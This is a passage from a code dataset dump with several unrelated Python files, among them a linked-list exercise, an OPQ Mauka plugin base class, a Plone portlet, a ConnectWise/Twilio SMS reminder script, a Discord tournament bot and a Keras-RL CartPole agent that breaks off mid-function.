itr.next\r\n\r\n itr.next = node\r\n\r\n def insert_at_beginning(self, data):\r\n\r\n if self.head is None:\r\n node = Node(data)\r\n self.head = node\r\n return\r\n\r\n node = Node(data, self.head)\r\n self.head = node\r\n\r\n def insert_at(self, index, data):\r\n if index < -1 or index >= self.get_length():\r\n raise Exception(\"Index out of range\")\r\n\r\n if self.head is None:\r\n node = Node(data)\r\n self.head = node\r\n return\r\n\r\n count = 0\r\n itr = self.head\r\n\r\n while itr:\r\n if count == index:\r\n node = Node(data, itr.next)\r\n itr.next = node\r\n return\r\n count += 1\r\n\r\n def remove_node(self, index):\r\n count = 0\r\n\r\n if self.head is None:\r\n print('Linked list is Empty')\r\n\r\n itr = self.head\r\n while itr:\r\n if count == index - 1:\r\n itr.next = itr.next.next\r\n return\r\n count += 1\r\n itr = itr.next\r\n\r\n def print_linkedlist(self):\r\n itr = self.head\r\n while itr:\r\n print(itr.data, end='-->')\r\n\r\n itr = itr.next\r\n print()\r\n\r\n\r\nl = Linked_list()\r\nl.insert_at_end(0)\r\nl.insert_at_end(1)\r\nl.insert_at_end(2)\r\nl.insert_at_end(3)\r\nl.insert_at(2, 1.5)\r\nl.print_linkedlist()\r\n\r\nl.remove_node(3)\r\nl.print_linkedlist()\r\n","sub_path":"Others/linked_list1.py","file_name":"linked_list1.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"469098596","text":"'''\nimport tensorflow as tf\n\nwith tf.Session() as sess:\n a = tf.constant(3, name='a')\n b = tf.constant(5, name='b')\n prod = tf.multiply(a, b, name='Multiply')\n sum = tf.add(a, b, name='Add')\n res = tf.divide(prod, sum, name='divide')\n\n out = sess.run(res)\n print(out)\n'''\n\nimport tf_api as tf\n\n# create default graph\ntf.Graph().as_default()\n\n# construct computational graph by creating some nodes\na = tf.Constant(15)\nb = tf.Constant(5)\nprod = tf.multiply(a, b)\nsum = tf.add(a, b)\nres = tf.divide(prod, sum)\n\n# create a session object\nsession = tf.Session()\n\n# run computational graph to compute the output for 'res'\nout = session.run(res)\nprint(out)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"595632192","text":"\"\"\"\nThis module provides classes and base functionality for building OPQMauka plugins.\n\"\"\"\n\nimport json\nimport logging\nimport multiprocessing\nimport signal\nimport threading\nimport typing\nimport time\nimport os\n\nimport bson\nimport bson.objectid\nimport zmq\n\nimport mongo.mongo\nimport protobuf.opq_pb2 as opqpb\n\n_logger = logging.getLogger(\"app\")\nlogging.basicConfig(\n format=\"[%(levelname)s][%(asctime)s][{} %(filename)s:%(lineno)s - %(funcName)s() ] %(message)s\".format(\n os.getpid()))\n_logger.setLevel(logging.DEBUG)\n\n\ndef run_plugin(plugin_class, config: typing.Dict):\n \"\"\"Runs the given plugin using the given configuration dictionary\n\n :param plugin_class: Name of the class of the plugin to be ran\n :param config: Configuration dictionary\n \"\"\"\n\n def _run_plugin():\n \"\"\"Inner function that acts as target to multiprocess constructor\"\"\"\n plugin_instance = plugin_class(config)\n plugin_instance._run()\n\n process = multiprocessing.Process(target=_run_plugin)\n process.start()\n\nclass JSONEncoder(json.JSONEncoder):\n \"\"\"\n This class allows us to serialize items with ObjectIds to JSON\n \"\"\"\n\n def default(self, o):\n \"\"\"If o is an object id, return the string of it, otherwise use the default encoder for this object\n\n :param o: Object to serialize\n :return: Serialized version of this object\n \"\"\"\n if isinstance(o, bson.ObjectId):\n return str(o)\n return json.JSONEncoder.default(self, o)\n\n\nclass MaukaPlugin:\n \"\"\"\n This is the base MaukaPlugin class that provides easy access to the database and also provides publish/subscribe\n semantics and distributed processing primitives.\n \"\"\"\n\n NAME = \"MaukaPlugin\"\n\n def __init__(self, config: typing.Dict, subscriptions: typing.List[str], name: str, exit_event: multiprocessing.Event):\n \"\"\" Initializes the base plugin\n\n :param config: Configuration dictionary\n :param subscriptions: List of subscriptions this plugin should subscribe to\n :param name: The name of this plugin\n \"\"\"\n\n self.config = config\n \"\"\"Configuration dictionary\"\"\"\n\n self.subscriptions = subscriptions\n \"\"\"Plugin subscriptions\"\"\"\n\n self.name = name\n \"\"\"Plugin name\"\"\"\n\n self.exit_event = exit_event\n \"\"\"Multiprocessing primitive that when set allows us to easily exit a process or thread\"\"\"\n\n self.mongo_client = self.get_mongo_client()\n \"\"\"MongoDB OPQ client\"\"\"\n\n self.zmq_context = zmq.Context()\n \"\"\"ZeroMQ context\"\"\"\n\n self.zmq_consumer = self.zmq_context.socket(zmq.SUB)\n \"\"\"ZeroMQ consumer\"\"\"\n\n self.zmq_producer = self.zmq_context.socket(zmq.PUB)\n \"\"\"ZeroMQ producer\"\"\"\n\n self.heartbeat_interval_s = float(self.config_get(\"plugins.base.heartbeatIntervalS\"))\n \"\"\"How often in seconds this plugin should produce a heartbeat\"\"\"\n\n self.on_message_cnt = 0\n \"\"\"Number of times this plugin has received a message since starting\"\"\"\n\n self.last_received = 0\n \"\"\"Timestamp since this plugin has last received a message\"\"\"\n\n self.logger = _logger\n\n self.producer_lock = multiprocessing.Lock()\n\n self.zmq_consumer.connect(self.config_get(\"zmq.mauka.plugin.sub.interface\"))\n self.zmq_producer.connect(self.config_get(\"zmq.mauka.plugin.pub.interface\"))\n\n # Every plugin subscribes to itself to allow for plugin control\n self.subscriptions.append(name)\n\n def get_status(self) -> str:\n \"\"\" Return the status of this plugin\n :return: The status of this plugin\n \"\"\"\n return \"N/A\"\n\n def to_json(self, obj: object) -> str:\n \"\"\"Serializes the given object to json\n\n :param obj: The object to serialize\n :return: JSON representation of object\n \"\"\"\n return json.dumps(obj, cls=JSONEncoder)\n\n def from_json(self, json_str: str) -> typing.Dict:\n \"\"\"Deserialize json into dictionary\n\n :param json_str: JSON string to deserialize\n :return: Dictionary from json\n \"\"\"\n return json.loads(json_str)\n\n def get_mongo_client(self):\n \"\"\" Returns an OPQ mongo client\n\n :return: An OPQ mongo client\n \"\"\"\n mongo_host = self.config_get(\"mongo.host\")\n mongo_port = self.config_get(\"mongo.port\")\n mongo_db = self.config_get(\"mongo.db\")\n return mongo.mongo.OpqMongoClient(mongo_host, mongo_port, mongo_db)\n\n def start_heartbeat(self):\n \"\"\"\n This is a recursive function that acts as a heartbeat.\n\n This function calls itself over-and-over on a timer to produce heartbeat messages. The interval can be\n configured is the configuration file.\n \"\"\"\n\n start_after_seconds = 5.0\n\n def heartbeat():\n self.produce(\"heartbeat\".encode(), \"{}:{}:{}:{}\".format(self.name, self.on_message_cnt, self.last_received,\n self.get_status()).encode())\n timer = threading.Timer(self.heartbeat_interval_s, heartbeat)\n timer.start()\n\n threading.Timer(start_after_seconds, heartbeat).start()\n\n def config_get(self, key: str) -> str:\n \"\"\"Retrieves a value from the configuration dictionary\n\n :param key: The key associated with the value we're looking to retrieve\n :return: The value associated with the provided key\n :raises KeyError: When key is not in the configuration\n \"\"\"\n if key not in self.config:\n raise KeyError(\"Key {} not in config\".format(key))\n else:\n return self.config[key]\n\n def object_id(self, oid: str) -> bson.objectid.ObjectId:\n \"\"\"Given the string representation of an object an id, return an instance of an ObjectID\n\n :param oid: The oid to encode\n :return: ObjectId from string\n \"\"\"\n return bson.objectid.ObjectId(oid)\n\n def on_message(self, topic, message):\n \"\"\"This gets called when a subscriber receives a message from a topic they are subscribed too.\n\n This should be implemented in all subclasses.\n\n :param topic: The topic this message is associated with\n :param message: The message contents\n \"\"\"\n _logger.info(\"on_message not implemented\")\n\n def produce(self, topic, message):\n \"\"\"Produces a message with a given topic to the system\n\n :param topic: The topic to produce this message to\n :param message: The message to produce\n \"\"\"\n with self.producer_lock:\n self.zmq_producer.send_multipart((topic, message))\n\n\n def is_self_message(self, topic: str) -> bool:\n \"\"\"Determines if this is a message directed at this plugin. I.e. the topic is the name of the plugin.\n\n :param topic: Topic of the message\n :return: If this is a self message or not\n \"\"\"\n return topic == self.name\n\n def handle_self_message(self, message: str):\n \"\"\"Handles a self-message\n\n :param message: The message to handle\n \"\"\"\n if \"EXIT\" == message:\n self.exit_event.set()\n\n def _run(self):\n \"\"\"This is the run loop for this plugin process\"\"\"\n _logger.info(\"Starting Mauka plugin: {}\".format(self.name))\n signal.signal(signal.SIGTERM, signal.SIG_IGN)\n signal.signal(signal.SIGINT, signal.SIG_IGN)\n\n for subscription in self.subscriptions:\n self.zmq_consumer.setsockopt_string(zmq.SUBSCRIBE, subscription)\n\n self.start_heartbeat()\n\n while not self.exit_event.is_set():\n data = self.zmq_consumer.recv_multipart()\n\n if len(data) != 2:\n _logger.error(\"Malformed data from ZMQ. Data size should = 2, but instead is {}\".format(len(data)))\n for d in data:\n _logger.error(\"{}\".format(d.decode()))\n break\n\n topic = data[0].decode()\n message = data[1]\n\n if self.is_self_message(topic):\n _logger.info(\"Receive self message\")\n self.handle_self_message(message.decode())\n else:\n # Update statistics\n self.on_message_cnt += 1\n self.last_received = time.time()\n self.on_message(topic, message)\n\n _logger.info(\"Exiting Mauka plugin: {}\".format(self.name))\n","sub_path":"mauka/plugins/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"601783287","text":"from zope.interface import Interface\nfrom zope.interface import implements\n\nfrom plone.app.portlets.portlets import base\nfrom plone.portlets.interfaces import IPortletDataProvider\n\nfrom zope import schema\nfrom zope.formlib import form\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\n# BEGIN CUSTOM IMPORTS\n\n\n\n# END CUSTOM IMPORTS\n\nfrom Products.healthsystemportlets import healthsystemportletsMessageFactory as _\n\nfrom zope.i18nmessageid import MessageFactory\n__ = MessageFactory(\"plone\")\n\nclass Itestportlet(IPortletDataProvider):\n \"\"\"A portlet\n\n It inherits from IPortletDataProvider because for this portlet, the\n data that is being rendered and the portlet assignment itself are the\n same.\n \"\"\"\n\n# field_richtext = schema.RichText(\n# title=_(u\"richtext\"),\n# default_mime_type='text/structured',\n# output_mime_type='text/html',\n# allowed_mime_types=('text/structured', 'text/plain',),\n# default=u\"Default value\"\n# )\n\n field_textline = schema.TextLine(\n title=_(u\"string\"),\n description=_(u\"description\"),\n default=u\"5\",\n required=False\n )\n\n field_text = schema.Text(\n title=_(u\"textarea\"),\n description=_(u\"description\"),\n required=False\n )\n\n# field_list = schema.List(\n# title=_(u\"list\"),\n# description=_(u\"description\"),\n# required=False\n# )\n\n field_int = schema.Int(\n title=_(u\"integer\"),\n description=_(u\"description\"),\n required=False\n )\n\n field_choice = schema.Choice(\n title=_(u\"choice\"),\n description=_(u\"description\"),\n values=(\"item A\", \"item B\", \"item C\", \"item D\", \"item E\"),\n required=False\n )\n\n enable_header = schema.Bool(\n title=_(u\"turn on portlet header\"),\n description=_(u\"tick this box if you want to render the header.\"),\n required=False,\n default=False\n )\n\n enable_footer = schema.Bool(\n title=_(u\"turn on portlet footer\"),\n description=_(u\"tick this box if you want to render the footer.\"),\n required=False,\n default=False\n )\n\n\nclass Assignment(base.Assignment):\n \"\"\"Portlet assignment.\n\n This is what is actually managed through the portlets UI and associated\n with columns.\n \"\"\"\n\n implements(Itestportlet)\n\n # TODO: Set default values for the configurable parameters here\n some_field = u\"\"\n\n # TODO: Add keyword parameters for configurable parameters here\n def __init__(self, field_textline=u'', field_text=u'', field_int=u'', field_choice=u'', enable_header=False, enable_footer=False):\n self.field_textline = field_textline\n self.field_text = field_text\n self.field_int = field_int\n self.field_choice = field_choice\n self.enable_header = enable_header\n self.enable_footer = enable_footer\n\n # def __init__(self):\n # pass\n\n @property\n def title(self):\n \"\"\"This property is used to give the title of the portlet in the\n \"manage portlets\" screen.\n \"\"\"\n return __(u\"test portlet\")\n\n\nclass Renderer(base.Renderer):\n \"\"\"Portlet renderer.\n\n This is registered in configure.zcml. The referenced page template is\n rendered, and the implicit variable 'view' will refer to an instance\n of this class. Other methods can be added and referenced in the template.\n \"\"\"\n\n render = ViewPageTemplateFile('testportlet.pt')\n\n\n# NOTE: If this portlet does not have any configurable parameters, you can\n# inherit from NullAddForm and remove the form_fields variable.\n\n\nclass AddForm(base.AddForm):\n \"\"\"Portlet add form.\n\n This is registered in configure.zcml. The form_fields variable tells\n zope.formlib which fields to display. The create() method actually\n constructs the assignment that is being added.\n \"\"\"\n form_fields = form.Fields(Itestportlet)\n label = _(u\"This is a Test Portlet\")\n description = _(u\"This portlet is used to test functionality.\")\n\n def create(self, data):\n return Assignment(**data)\n\n\n# NOTE: IF this portlet does not have any configurable parameters, you can\n# remove this class definition and delete the editview attribute from the\n# registration in configure.zcml\n\nclass EditForm(base.EditForm):\n \"\"\"Portlet edit form.\n\n This is registered with configure.zcml. The form_fields variable tells\n zope.formlib which fields to display.\n \"\"\"\n form_fields = form.Fields(Itestportlet)\n label = _(u\"This is a Test Portlet\")\n description = _(u\"This portlet is used to test functionality.\")\n","sub_path":"Products/healthsystemportlets/portlets/testportlet.py","file_name":"testportlet.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"109527111","text":"from pathlib import Path\npath = Path(__file__).parent / \"../../input.txt\"\n\ndata = []\nwith path.open(\"rt\") as f:\n data = f.readlines()\n\ndef bootComp(codes):\n visitedLoc = []\n loc = 0\n accum = 0\n isLoop = True\n while not(loc in visitedLoc) and isLoop:\n if loc == len(codes)-1:\n isLoop = False\n\n visitedLoc.append(loc)\n opCode = data[loc][:3]\n if opCode == 'acc':\n accum += int(data[loc].split(\" \")[1])\n loc += 1\n elif opCode == 'jmp':\n loc += int(data[loc].split(\" \")[1])\n elif opCode == 'nop':\n loc += 1\n return [isLoop,accum]\n\ndef changeCode(line):\n if line[:3] == 'jmp':\n line = \"nop\" + line[3:]\n elif data[x][:3] == 'nop':\n line = \"jmp\" + line[3:]\n else:\n line = \"\"\n return line\n\n\nresult = [True,0]\nfor x in range(0,len(data)):\n line = changeCode(data[x])\n if line == \"\":\n continue\n else:\n data[x] = line\n result = bootComp(data)\n if not(result[0]):\n break\n #change it back!\n data[x] = changeCode(data[x])\n\nprint(result[1])","sub_path":"Day 8/Python/Part 1/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"578651186","text":"import static_vars, requests, json\nfrom twilio.rest import Client\nfrom datetime import datetime, date, timedelta, time\nfrom pytz import timezone, datetime, tzinfo\n\n# Twilio\naccount_sid = static_vars.TWIL_TEST_SID\nauth_token = static_vars.TWIL_TEST_TOKEN\nclient = Client(account_sid, auth_token)\ncontactPhone = static_vars.MY_PHONE\n\n# Connectwise\nheaders = static_vars.BASE_HEADERS\n\n # For time conversions\ntoday = date.today()\ntoday = str(today)\nyesterday = date.today() - timedelta(1)\nyesterday = str(yesterday)\nfmt = '%H:%M' \ntranslation_table = dict.fromkeys(map(ord, 'T'), ' ')\ntranslation_table2 = dict.fromkeys(map(ord, 'Z'), ' UTC+0000')\nadelaide = timezone('Australia/Adelaide')\n\n# For JSON data\nj = 0\nurl = static_vars.BASE_URL+\"/schedule/entries?conditions=dateStart > [\"+ yesterday +\"T13:30:00Z] and dateEnd < [\"+ today +\"T13:29:59Z]&pageSize=1000\"\nresponse = requests.request(\"GET\", url, headers=headers)\njsondata = json.loads(response.text)\n\n# Connectwise query\ndef sched(): \n global j\n global member\n global ticketNumber\n global cwdatestart\n global ticketSummary\n global ticketPhone\n\n try: \n ticketNumber = jsondata[j]['objectId']\n ticketUrl = static_vars.BASE_URL+\"/service/tickets/\"+ str(ticketNumber)\n ticketResponse = requests.request(\"GET\", ticketUrl, headers=headers)\n ticketdata = json.loads(ticketResponse.text)\n ticketSummary = ticketdata['summary']\n ticketPhone = ticketdata['contactPhoneNumber']\n sitevisit = []\n member = jsondata[j]['member']['name']\n cwdatestart = jsondata[j]['dateStart']\n cwdateend = jsondata[j]['dateEnd']\n\n contactID = ticketdata['contact']['id']\n contactUrl = static_vars.BASE_URL+\"/company/contacts/\"+ str(contactID) +\"/communications\"\n contactResponse = requests.request(\"GET\", contactUrl, headers=headers)\n contactData = json.loads(contactResponse.text)\n c = 0\n while c < len(contactData):\n try: \n if 'Mobile' in contactData[c]['type']['name']:\n ticketPhone = contactData[c]['value']\n break\n else:\n c += 1\n except KeyError:\n c += 1\n continue\n cwdatestart = cwdatestart.translate(translation_table)\n cwdateend = cwdateend.translate(translation_table)\n\n cwdatestart = cwdatestart.translate(translation_table2)\n cwdateend = cwdateend.translate(translation_table2)\n \n cwdatestart = datetime.datetime.strptime(cwdatestart, \"%Y-%m-%d %H:%M:%S %Z%z\")\n cwdateend = datetime.datetime.strptime(cwdateend, \"%Y-%m-%d %H:%M:%S %Z%z\")\n\n cwdatestart = cwdatestart.astimezone(adelaide)\n cwdateend = cwdateend.astimezone(adelaide)\n except KeyError:\n sms()\n \n sms()\n\n# SMS function\ndef sms():\n global ticketNumber\n global ticketSummary\n global ticketPhone\n global cwdatestart\n global member\n global j\n \n #message = client.messages.create(\n # from_= static_vars.TWIL_PHONE,\n # body= \"Good morning, your site visit is scheduled to take place today at DATETIME with ENGINEER\",\n # to=contactPhone\n #)\n\n #print(message.sid)\n print(\"from_: Subnet Reminder Service\")\n print(\"to: \"+ ticketPhone)\n print(\"body: REMINDER: Your ticket \"+ str(ticketNumber) + \" - \" + ticketSummary + \" is scheduled for today at \"+ str(cwdatestart) + \" with \"+ member + \". Please contact 08 7127 9455 for change or cancel your appointment.\")\n j += 1\n sched()\n\nsched()","sub_path":"Building Blocks/smspoc.py","file_name":"smspoc.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"593015728","text":"#! /usr/bin/env python3\n\n# The MIT License (MIT)\n# Copyright (c) 2017 Levak Borok \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nimport discord\nimport asyncio\nimport sys\n\nfrom rolekeeper import RoleKeeper\n\nimport json\n\ndef get_config(path):\n try:\n with open(path, 'r') as f:\n config = json.load(f)\n return config\n except FileNotFoundError as e:\n print('ERROR while loading config.\\n{}: \"{}\"'\\\n .format(e.strerror, e.filename))\n return None\n except Exception as e:\n print('ERROR while loading config.\\n{}: line {} col {}'\\\n .format(e.msg, e.lineno, e.colno))\n return None\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n await rk.on_ready()\n\n@client.event\nasync def on_member_join(member):\n await rk.on_member_join(member)\n\n@client.event\nasync def on_message(message):\n # If message is a DM\n if type(message.author) is discord.User:\n await rk.on_dm(message)\n return\n\n is_admin = message.author.server_permissions.manage_roles\n is_ref = discord.utils.get(message.author.roles, name=rk.config['roles']['referee']) or is_admin\n is_captain_in_match = rk.is_captain_in_match(message.author, message.channel) or is_admin or is_ref\n is_streamer = discord.utils.get(message.author.roles, name=rk.config['roles']['streamer']) or is_admin\n\n if len(message.content) <= 0:\n return\n\n command = message.content.split()[0]\n args = message.content.replace(command, '', 1).strip()\n\n # ADMIN COMMANDS\n #----------------\n\n if command == '!refresh' and is_admin:\n await rk.refresh(message.author.server)\n elif command == '!create_teams' and is_admin:\n await rk.create_all_roles(message.author.server)\n\n elif command == '!wipe_teams' and is_admin:\n await rk.wipe_teams(message.author.server)\n\n elif command == '!wipe_matches' and is_admin:\n await rk.wipe_matches(message.author.server)\n\n elif command == '!wipe_messages' and is_admin:\n if len(message.channel_mentions) < 1:\n await rk.reply(message,\n 'Not enough arguments:\\n```!wipe_messages #channel```')\n else:\n await rk.wipe_messages(message, message.channel_mentions[0])\n\n elif command == '!announce' and is_admin:\n await rk.announce(args, message)\n\n elif command == '!members' and is_admin:\n await rk.export_members(args, message)\n\n # REF COMMANDS\n #--------------\n\n elif command == '!add_captain' and is_ref:\n parts = args.split()\n if len(message.mentions) == 1 and len(parts) >= 4:\n await rk.add_captain(message,\n message.author.server,\n message.mentions[0], # TODO check it's the first argument?\n parts[1],\n parts[2],\n parts[3])\n else:\n await rk.reply(message,\n 'Too much or not enough arguments:\\n```!add_captain @xxx team nick group```')\n\n elif command == '!remove_captain' and is_ref:\n if len(message.mentions) == 1:\n await rk.remove_captain(message,\n message.author.server,\n message.mentions[0])\n else:\n await rk.reply(message,\n 'Too much or not enough arguments:\\n```!remove_captain @xxx```')\n\n elif command == '!bo1' and is_ref:\n if len(message.role_mentions) == 2:\n await rk.matchup(message,\n message.author.server,\n message.role_mentions[0],\n message.role_mentions[1],\n mode=RoleKeeper.MATCH_BO1)\n else:\n await rk.reply(message,\n 'Too much or not enough arguments:\\n```!bo1 @xxx @yyy```')\n\n elif command == '!bo2' and is_ref:\n if len(message.role_mentions) == 2:\n await rk.matchup(message,\n message.author.server,\n message.role_mentions[0],\n message.role_mentions[1],\n mode=RoleKeeper.MATCH_BO2)\n else:\n await rk.reply(message,\n 'Too much or not enough arguments:\\n```!bo2 @xxx @yyy```')\n\n elif command == '!bo3' and is_ref:\n if len(message.role_mentions) == 2:\n await rk.matchup(message,\n message.author.server,\n message.role_mentions[0],\n message.role_mentions[1],\n mode=RoleKeeper.MATCH_BO3)\n else:\n await rk.reply(message,\n 'Too much or not enough arguments:\\n```!bo3 @xxx @yyy```')\n\n elif command == '!say' and is_ref:\n parts = args.split()\n if len(parts) <= 1:\n await rk.reply(message,\n 'Not enough arguments:\\n```!say #channel message...```')\n else:\n channel_id = parts[0]\n if channel_id.startswith('<'):\n channel_id = channel_id[2:-1]\n channel = discord.utils.get(message.author.server.channels, id=channel_id)\n else:\n channel = discord.utils.get(message.author.server.channels, name=channel_id)\n\n if channel:\n msg = args.replace(parts[0], '', 1)\n try:\n await rk.client.send_message(channel, msg)\n except:\n await rk.reply(message,\n 'I do not see channel `#{}`'.format(channel.name))\n else:\n await rk.reply(message,\n 'No channel named `#{}`'.format(channel_id))\n\n\n # CAPTAIN COMMANDS\n #-------------------\n\n\n elif command == '!ban' and is_captain_in_match:\n await rk.ban_map(message.author,\n message.channel,\n args.split()[0] if len(args) > 0 else '',\n force=is_ref)\n\n elif command == '!pick' and is_captain_in_match:\n await rk.pick_map(message.author,\n message.channel,\n args.split()[0] if len(args) > 0 else '',\n force=is_ref)\n\n elif command == '!side' and is_captain_in_match:\n await rk.choose_side(message.author,\n message.channel,\n args.split()[0] if len(args) > 0 else '',\n force=is_ref)\n\n # STREAMER COMMANDS\n #-------------------\n\n elif command == '!stream' and is_streamer:\n await rk.stream_match(message,\n args.split()[0] if len(args) > 0 else '')\n\nif __name__ == '__main__':\n\n config = None\n\n if len(sys.argv) > 1:\n config = get_config(sys.argv[1])\n else:\n print('Using default configuration file path: `config.json`')\n config = get_config('config.json')\n\n if config:\n rk = RoleKeeper(client, config)\n client.run(config['app_bot_token'])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"309338870","text":"def main():\n tc = int(input())\n for t in range(tc):\n line = list(map(int, input().split()))\n A_P = line[0]\n B_Q = line[1]\n B_R = line[2]\n B_S = line[3]\n W = line[4]\n A_total = A_P * W\n B_total = 0\n if W <= B_R:\n B_total = B_Q\n else:\n W_tmp = W - B_R\n B_total = W_tmp * B_S + B_Q\n\n ans = 0\n if A_total < B_total:\n ans = A_total\n else:\n ans = B_total\n\n print(\"#\"+str(t+1), ans)\n\nif __name__ == '__main__':\n main()\n","sub_path":"D2/D2_1284_수도_요금_경쟁.py","file_name":"D2_1284_수도_요금_경쟁.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"296130074","text":"#Importing the necessary plotting libraries\nimport numpy as np\nimport gym\nfrom keras.layers import Dense, Flatten, Activation\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\nfrom keras.models import Model\nfrom keras.utils.vis_utils import plot_model\nfrom rl.agents import SARSAAgent\nfrom rl.policy import EpsGreedyQPolicy\nfrom rl.callbacks import TrainEpisodeLogger\nfrom keras.layers.merge import concatenate\nfrom keras.layers import Input\nfrom rl.callbacks import ModelIntervalCheckpoint, FileLogger\nimport json\n\n\n#Setting up the environment\nenv = gym.make('CartPole-v1')\nseed_val = 456\nenv.seed(seed_val)\nnp.random.seed(seed_val)\nlog_dir='log/'\nalgo='SARSA'\n\n\n#Getting the state and action space\nstates = env.observation_space.shape[0]\nactions = env.action_space.n\n\n#Callback for storing training data\ndef build_callbacks(filename):\n #checkpoint_weights_filename = 'dqn_' + env_name + '_weights_{step}.h5f'\n #callbacks = [ModelIntervalCheckpoint(checkpoint_weights_filename, interval=5000)]\n \n log_filename = filename+'_train.json'\n callbacks = [FileLogger(log_filename, interval=100)]\n return callbacks\n\n#Defining a Neural Network function for our Cartpole agent \ndef agent0(states, actions):\n \"\"\"Creating a simple Deep Neural Network.\"\"\"\n\n in_1=Input(shape = (1, states))\n fin_1=Flatten()(in_1)\n D_1=Dense(24, activation='relu')(fin_1)\n D_2=(Dense(24, activation='relu')(D_1))\n D_3=(Dense(24, activation='relu')(D_2)) \n outputs=Dense(actions,activation='linear')(D_3)\n \n model=Model(inputs=in_1,outputs=outputs)\n plot_model(model,show_shapes=True, to_file='models/agent0.png')\n return model\n\ndef agent1(states, actions):\n \"\"\"Creating a simple Deep Neural Network.\"\"\"\n\n in_1=Input(shape = (1, states))\n fin_1=Flatten()(in_1)\n D_1=Dense(24, activation='relu')(fin_1)\n D_2=(Dense(24, activation='relu')(D_1))\n D_3=(Dense(24, activation='relu')(D_2))\n #out1=(Dense(actions, activation='linear')(D_3))\n out1=D_3\n \n D_11=(Dense(24, activation='relu')(fin_1))\n D_22=(Dense(24, activation='relu')(D_11))\n D_33=(Dense(24, activation='relu')(D_22))\n out2=D_33\n\n\n #out2=(Dense(actions, activation='linear')(D_33))\n\n merged=concatenate([out1,out2])\n outputs=Dense(actions,activation='linear')(merged)\n model=Model(inputs=in_1,outputs=outputs)\n plot_model(model,show_shapes=True, to_file='models/agent1.png')\n return model\n\ndef agent2(states, actions):\n \"\"\"Creating a simple Deep Neural Network.\"\"\"\n\n in_1=Input(shape = (1, states))\n fin_1=Flatten()(in_1)\n D_1=Dense(12, activation='relu')(fin_1)\n D_2=(Dense(12, activation='relu')(D_1))\n D_3=(Dense(12, activation='relu')(D_2))\n #out1=(Dense(actions, activation='linear')(D_3))\n out1=D_3\n \n D_11=(Dense(12, activation='relu')(fin_1))\n D_22=(Dense(12, activation='relu')(D_11))\n D_33=(Dense(12, activation='relu')(D_22))\n out2=D_33\n\n\n #out2=(Dense(actions, activation='linear')(D_33))\n\n merged=concatenate([out1,out2])\n outputs=Dense(actions,activation='linear')(merged)\n model=Model(inputs=in_1,outputs=outputs)\n plot_model(model,show_shapes=True, to_file='models/agent2.png')\n return model\n\ndef agent3(states, actions):\n \"\"\"Creating a simple Deep Neural Network.\"\"\"\n\n in_1=Input(shape = (1, states))\n fin_1=Flatten()(in_1)\n D_1=Dense(24, activation='relu')(fin_1)\n D_2=(Dense(24, activation='relu')(D_1))\n D_3=(Dense(24, activation='relu')(D_2))\n \n out1=D_3\n \n D_11=(Dense(24, activation='relu')(fin_1))\n D_22=(Dense(24, activation='relu')(D_11))\n D_33=(Dense(24, activation='relu')(D_22))\n out2=D_33\n\n D_111=(Dense(24, activation='relu')(fin_1))\n D_222=(Dense(24, activation='relu')(D_111))\n D_333=(Dense(24, activation='relu')(D_222))\n out3=D_333\n \n\n merged=concatenate([out1,out2,out3])\n outputs=Dense(actions,activation='linear')(merged)\n model=Model(inputs=in_1,outputs=outputs)\n plot_model(model,show_shapes=True, to_file='models/agent3.png')\n return model\n\ndef agent4(states, actions):\n \"\"\"Creating a simple Deep Neural Network.\"\"\"\n\n in_1=Input(shape = (1, states))\n fin_1=Flatten()(in_1)\n D_1=Dense(8, activation='relu')(fin_1)\n D_2=(Dense(8, activation='relu')(D_1))\n D_3=(Dense(8, activation='relu')(D_2))\n #out1=(Dense(actions, activation='linear')(D_3))\n out1=D_3\n \n D_11=(Dense(8, activation='relu')(fin_1))\n D_22=(Dense(8, activation='relu')(D_11))\n D_33=(Dense(8, activation='relu')(D_22))\n out2=D_33\n\n D_111=(Dense(8, activation='relu')(fin_1))\n D_222=(Dense(8, activation='relu')(D_111))\n D_333=(Dense(8, activation='relu')(D_222))\n out3=D_333\n #out2=(Dense(actions, activation='linear')(D_33))\n\n merged=concatenate([out1,out2,out3])\n 